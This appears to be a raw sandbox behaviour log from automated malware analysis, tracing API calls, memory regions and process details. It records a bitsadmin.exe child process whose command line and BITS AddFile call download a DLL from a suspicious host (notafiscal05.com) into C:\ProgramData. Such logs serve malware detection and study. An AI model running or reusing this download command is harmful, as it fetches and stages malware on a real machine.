[0077.804] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8dc54, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dc54*=0x8) returned 1
[0077.804] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0077.804] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8dc60 | out: _Buffer="326656") returned 6
[0077.804] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8dc64 | out: _Buffer="326656") returned 6
[0077.804] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8dc60 | out: _Buffer="100") returned 3
[0077.804] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dc5c | out: lpConsoleScreenBufferInfo=0x8dc5c) returned 1
[0077.805] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x8dc74, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dc74*=0x16) returned 1
[0077.805] CoTaskMemFree (pv=0x2383c0)
[0077.805] IBackgroundCopyJob:Complete (This=0x22a624) returned 0x0
[0077.811] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dc60 | out: lpConsoleScreenBufferInfo=0x8dc60) returned 1
[0077.811] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dc34 | out: lpConsoleScreenBufferInfo=0x8dc34) returned 1
[0077.812] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x8dc4c, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dc4c*=0x2) returned 1
[0077.812] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dc34 | out: lpConsoleScreenBufferInfo=0x8dc34) returned 1
[0077.812] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x8dc4c, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dc4c*=0x14) returned 1
[0077.812] GetCurrentThreadId () returned 0xdd8
[0077.812] PostThreadMessageW (idThread=0xdd8, Msg=0x401, wParam=0x0, lParam=0x0) returned 1
[0077.813] PeekMessageW (in: lpMsg=0x8f660, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8f660) returned 1
[0077.813] IUnknown:Release (This=0x22a624) returned 0x1
[0077.813] IUnknown:Release (This=0x22a54c) returned 0x0
[0077.813] CoUninitialize ()
[0077.815] IUnknown:Release (This=0x240cb0) returned 0x2
[0077.815] IUnknown:Release (This=0x240cb0) returned 0x1
[0077.815] IUnknown:Release (This=0x240cb0) returned 0x0
[0077.815] IUnknown:Release (This=0x22a624) returned 0x0
[0077.815] CoTaskMemFree (pv=0x240cb0)
[0077.818] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0077.818] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b7) returned 1
[0077.818] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0077.818] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0077.818] CloseHandle (hObject=0x80) returned 1
[0077.818] exit (_Code=0)
Thread:
id = 187
os_tid = 0xdec
Thread:
id = 188
os_tid = 0xdf0
Thread:
id = 189
os_tid = 0xdf4
Thread:
id = 190
os_tid = 0xdf8
Process:
id = "20"
image_name = "bitsadmin.exe"
filename = "c:\\windows\\system32\\bitsadmin.exe"
page_root = "0x7f1be640"
os_pid = "0xe58"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0xa98"
cmd_line = "\"C:\\Windows\\System32\\bitsadmin.exe\" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmhh.dll.zip?31092521 C:\\ProgramData\\tempa\\marxvxinhhm64.dll"
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1995
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1996
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1997
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1998
start_va = 0x170000
end_va = 0x1affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 1999
start_va = 0x530000
end_va = 0x573fff
entry_point = 0x530000
region_type = mapped_file
name = "bitsadmin.exe"
filename = "\\Windows\\System32\\bitsadmin.exe" (normalized: "c:\\windows\\system32\\bitsadmin.exe")
Region:
id = 2000
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2001
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2002
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 2003
start_va = 0x7ffd4000
end_va = 0x7ffd4fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd4000"
filename = ""
Region:
id = 2004
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 2005
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2006
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2007
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2008
start_va = 0x1b0000
end_va = 0x277fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001b0000"
filename = ""
Region:
id = 2009
start_va = 0x2f0000
end_va = 0x3effff
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 2010
start_va = 0x6c0000
end_va = 0x6cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000006c0000"
filename = ""
Region:
id = 2011
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 2012
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2013
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2014
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2015
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2016
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2017
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2018
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2019
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2020
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 2021
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2022
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2023
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2024
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2025
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 2026
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2027
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2028
start_va = 0xc0000
end_va = 0xc6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 2029
start_va = 0xd0000
end_va = 0xd1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2030
start_va = 0xe0000
end_va = 0xe0fff
entry_point = 0xe0000
region_type = mapped_file
name = "bitsadmin.exe.mui"
filename = "\\Windows\\System32\\en-US\\bitsadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\bitsadmin.exe.mui")
Region:
id = 2031
start_va = 0xf0000
end_va = 0xf0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2032
start_va = 0x100000
end_va = 0x100fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 2033
start_va = 0x3f0000
end_va = 0x4f0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003f0000"
filename = ""
Region:
id = 2034
start_va = 0x6d0000
end_va = 0x12cffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006d0000"
filename = ""
Region:
id = 2035
start_va = 0x110000
end_va = 0x16bfff
entry_point = 0x110000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2036
start_va = 0x110000
end_va = 0x16bfff
entry_point = 0x110000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2037
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2038
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2039
start_va = 0x580000
end_va = 0x64ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 2040
start_va = 0x12d0000
end_va = 0x13aefff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000012d0000"
filename = ""
Region:
id = 2041
start_va = 0x110000
end_va = 0x110fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000110000"
filename = ""
Region:
id = 2042
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2043
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2044
start_va = 0x120000
end_va = 0x120fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000120000"
filename = ""
Region:
id = 2045
start_va = 0x1400000
end_va = 0x143ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001400000"
filename = ""
Region:
id = 2046
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 2047
start_va = 0x5b0000
end_va = 0x5effff
entry_point = 0x0
region_type = private
name = "private_0x00000000005b0000"
filename = ""
Region:
id = 2048
start_va = 0x610000
end_va = 0x64ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000610000"
filename = ""
Region:
id = 2049
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 2050
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 2051
start_va = 0x130000
end_va = 0x16bfff
entry_point = 0x130000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2052
start_va = 0x130000
end_va = 0x16bfff
entry_point = 0x130000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2053
start_va = 0x130000
end_va = 0x16bfff
entry_point = 0x130000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2054
start_va = 0x130000
end_va = 0x16bfff
entry_point = 0x130000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2055
start_va = 0x130000
end_va = 0x16bfff
entry_point = 0x130000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2056
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2057
start_va = 0x1440000
end_va = 0x170efff
entry_point = 0x1440000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2058
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 2059
start_va = 0x130000
end_va = 0x16ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 2060
start_va = 0x280000
end_va = 0x2bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000280000"
filename = ""
Region:
id = 2061
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 2062
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 2063
start_va = 0x6f8b0000
end_va = 0x6f8b8fff
entry_point = 0x6f8b0000
region_type = mapped_file
name = "qmgrprxy.dll"
filename = "\\Windows\\System32\\qmgrprxy.dll" (normalized: "c:\\windows\\system32\\qmgrprxy.dll")
Thread:
id = 200
os_tid = 0xe5c
[0078.079] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afb04 | out: lpSystemTimeAsFileTime=0x1afb04*(dwLowDateTime=0xdf1eff50, dwHighDateTime=0x1d469c7))
[0078.079] GetCurrentProcessId () returned 0xe58
[0078.079] GetCurrentThreadId () returned 0xe5c
[0078.079] GetTickCount () returned 0x2163e
[0078.079] QueryPerformanceCounter (in: lpPerformanceCount=0x1afafc | out: lpPerformanceCount=0x1afafc*=1815202500000) returned 1
[0078.080] GetModuleHandleA (lpModuleName=0x0) returned 0x530000
[0078.080] __set_app_type (_Type=0x1)
[0078.080] __p__fmode () returned 0x757a31f4
[0078.080] __p__commode () returned 0x757a31fc
[0078.080] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x557f33) returned 0x0
[0078.080] __wgetmainargs (in: _Argc=0x570824, _Argv=0x57082c, _Env=0x570828, _DoWildCard=0, _StartInfo=0x570838 | out: _Argc=0x570824, _Argv=0x57082c, _Env=0x570828) returned 0
[0078.081] _onexit (_Func=0x55925e) returned 0x55925e
[0078.081] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0078.081] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0078.081] AitLogFeatureUsageByApp () returned 0x0
[0078.082] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0078.082] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0078.082] VerifyVersionInfoW (in: lpVersionInformation=0x1af978, dwTypeMask=0x3, dwlConditionMask=0x1b | out: lpVersionInformation=0x1af978) returned 1
[0078.082] SetLastError (dwErrCode=0x0)
[0078.082] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0078.082] GetProcAddress (hModule=0x75370000, lpProcName="HeapSetInformation") returned 0x753c4157
[0078.082] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0078.082] GetCurrentProcess () returned 0xffffffff
[0078.082] GetCurrentThread () returned 0xfffffffe
[0078.082] GetCurrentProcess () returned 0xffffffff
[0078.082] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x55c3b0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x55c3b0*=0x80) returned 1
[0078.083] SetConsoleCtrlHandler (HandlerRoutine=0x5474cb, Add=1) returned 1
[0078.083] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0078.083] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadUILanguage") returned 0x753c24c2
[0078.083] SetThreadUILanguage (LangId=0x0) returned 0x409
[0078.084] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437"
[0078.086] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437"
[0078.086] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437"
[0078.087] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437"
[0078.087] _wcsicmp (_String1="/transfer", _String2="/RAWRETURN") returned 2
[0078.087] _wcsicmp (_String1="/transfer", _String2="/WRAP") returned -3
[0078.087] _wcsicmp (_String1="/transfer", _String2="/NOWRAP") returned 6
[0078.087] swprintf_s (in: _Dst=0x1afa70, _SizeInWords=0x12, _Format="%u.%u.%u" | out: _Dst="7.5.7601") returned 8
[0078.087] GetFileType (hFile=0x7) returned 0x2
[0078.087] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1af9e4 | out: lpMode=0x1af9e4) returned 1
[0078.088] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1afa14, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1afa14*=0x2) returned 1
[0078.088] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0x1afa20, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1afa20*=0x24) returned 1
[0078.088] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1afa24, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1afa24*=0x1e) returned 1
[0078.088] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0x1afa28, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1afa28*=0x29) returned 1
[0078.088] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1afa2c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1afa2c*=0x2) returned 1
[0078.089] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x5e, lpNumberOfCharsWritten=0x1afa30, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1afa30*=0x5e) returned 1
[0078.089] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0x1afa34, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1afa34*=0x58) returned 1
[0078.089] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1afa38, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1afa38*=0x2) returned 1
[0078.089] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0078.105] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0078.105] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x3, lpNumberOfEvents=0x1afa84 | out: lpNumberOfEvents=0x1afa84) returned 1
[0078.105] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0078.105] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x55c3a8 | out: lpMode=0x55c3a8) returned 1
[0078.105] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x55c390 | out: lpConsoleScreenBufferInfo=0x55c390) returned 1
[0078.106] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x55c38c | out: lpMode=0x55c38c) returned 1
[0078.106] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0078.106] _wcsicmp (_String1="/transfer", _String2="/HELP") returned 12
[0078.106] _wcsicmp (_String1="/transfer", _String2="/?") returned 53
[0078.106] _wcsicmp (_String1="/transfer", _String2="/UTIL") returned -1
[0078.106] _wcsicmp (_String1="/transfer", _String2="/LIST") returned 8
[0078.106] _wcsicmp (_String1="/transfer", _String2="/MONITOR") returned 7
[0078.106] _wcsicmp (_String1="/transfer", _String2="/RESET") returned 2
[0078.106] _wcsicmp (_String1="/transfer", _String2="/TRANSFER") returned 0
[0078.106] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x1) returned 1
[0078.107] _wcsicmp (_String1="/priority", _String2="/UPLOAD") returned -5
[0078.107] _wcsicmp (_String1="/priority", _String2="/DOWNLOAD") returned 12
[0078.107] _wcsicmp (_String1="/priority", _String2="/PRIORITY") returned 0
[0078.107] _wcsicmp (_String1="foreground", _String2="FOREGROUND") returned 0
[0078.107] CoCreateInstance (in: rclsid=0x5465d4*(Data1=0x4991d34b, Data2=0x80a1, Data3=0x4291, Data4=([0]=0x83, [1]=0xb6, [2]=0x33, [3]=0x28, [4]=0x36, [5]=0x6b, [6]=0x90, [7]=0x97)), pUnkOuter=0x0, dwClsContext=0x4, riid=0x5465b4*(Data1=0x5ce34c0d, Data2=0xdc9, Data3=0x4c1f, Data4=([0]=0x89, [1]=0x7c, [2]=0xda, [3]=0xa1, [4]=0xb7, [5]=0x8c, [6]=0xee, [7]=0x7c)), ppv=0x55c3b4 | out: ppv=0x55c3b4*=0x30a544) returned 0x0
[0078.152] IBackgroundCopyManager:CreateJob (in: This=0x30a544, DisplayName="msd5", Type=0x0, pJobId=0x1afa4c, ppJob=0x1afa48 | out: pJobId=0x1afa4c*(Data1=0x5120db99, Data2=0x6486, Data3=0x4830, Data4=([0]=0xac, [1]=0x30, [2]=0xc1, [3]=0xe8, [4]=0x22, [5]=0xc7, [6]=0x30, [7]=0xb)), ppJob=0x1afa48*=0x30a61c) returned 0x0
[0078.161] CoTaskMemAlloc (cb=0x50) returned 0x320c70
[0078.161] IUnknown:AddRef (This=0x30a61c) returned 0x2
[0078.161] IUnknown:AddRef (This=0x30a61c) returned 0x3
[0078.161] PeekMessageW (in: lpMsg=0x1af9c4, hWnd=0x0, wMsgFilterMin=0x400, wMsgFilterMax=0x400, wRemoveMsg=0x0 | out: lpMsg=0x1af9c4) returned 0
[0078.161] IUnknown:Release (This=0x30a61c) returned 0x2
[0078.161] IBackgroundCopyJob:SetPriority (This=0x30a61c, Val=0x0) returned 0x0
[0078.176] IBackgroundCopyJob:AddFile (This=0x30a61c, RemoteUrl="http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmhh.dll.zip?31092521", LocalName="C:\\ProgramData\\tempa\\marxvxinhhm64.dll") returned 0x0
[0078.195] IBackgroundCopyJob:SetNotifyFlags (This=0x30a61c, Val=0xb) returned 0x0
[0078.199] IBackgroundCopyJob:SetNotifyInterface (This=0x30a61c, Val=0x320c70) returned 0x0
[0078.200] IUnknown:QueryInterface (in: This=0x320c70, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1af4c8 | out: ppvObject=0x1af4c8*=0x0) returned 0x80004002
[0078.200] IUnknown:QueryInterface (in: This=0x320c70, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1af488 | out: ppvObject=0x1af488*=0x0) returned 0x80004002
[0078.200] IUnknown:QueryInterface (in: This=0x320c70, riid=0x76a597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1af470 | out: ppvObject=0x1af470*=0x0) returned 0x80004002
